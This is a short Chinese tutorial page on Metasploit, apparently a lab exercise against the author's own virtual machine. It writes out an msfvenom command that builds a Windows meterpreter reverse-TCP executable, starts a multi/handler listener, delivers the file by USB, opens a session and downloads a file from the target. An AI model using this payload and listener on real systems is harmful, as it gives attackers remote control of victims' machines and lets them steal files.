你的位置:首页 > 信息动态 > 新闻中心
信息动态
联系我们

Metasploit的应用

2021/11/23 2:07:16

生成被控端

首先打开终端输入msfvenom -p windows/meterpreter/reverse_tcp lhost=(你的攻击机的IP)lport=5000 -f exe -o /root/payload.exe

二、生成主控端

在终端输入msfconsole进入Metaploit

然后输入use exploit /multi/handler启动handler命令,然后再设置lhost和lport,然后exploit等待目标机点开程序                                                                                                                                   

三、获得靶机控制权

将payload.exe复制到靶机里去(这里我用的是u盘,因为直接复制粘贴用不了,查看了设置发现VMware workstation tools已经下载了,并且客户机隔离的复制和拖拽都已经打勾了,所以只能用这种方法) 

然后双击该程序,回到Metaploit就会看到打开了一个session

现在开始我们就获得了靶机的控制权了

四、 下载靶机的任意一个文件

这里我在靶机里创建了一个1txt文件,然后在终端输入download 1.txt,就可以在攻击机里看到这个文件了。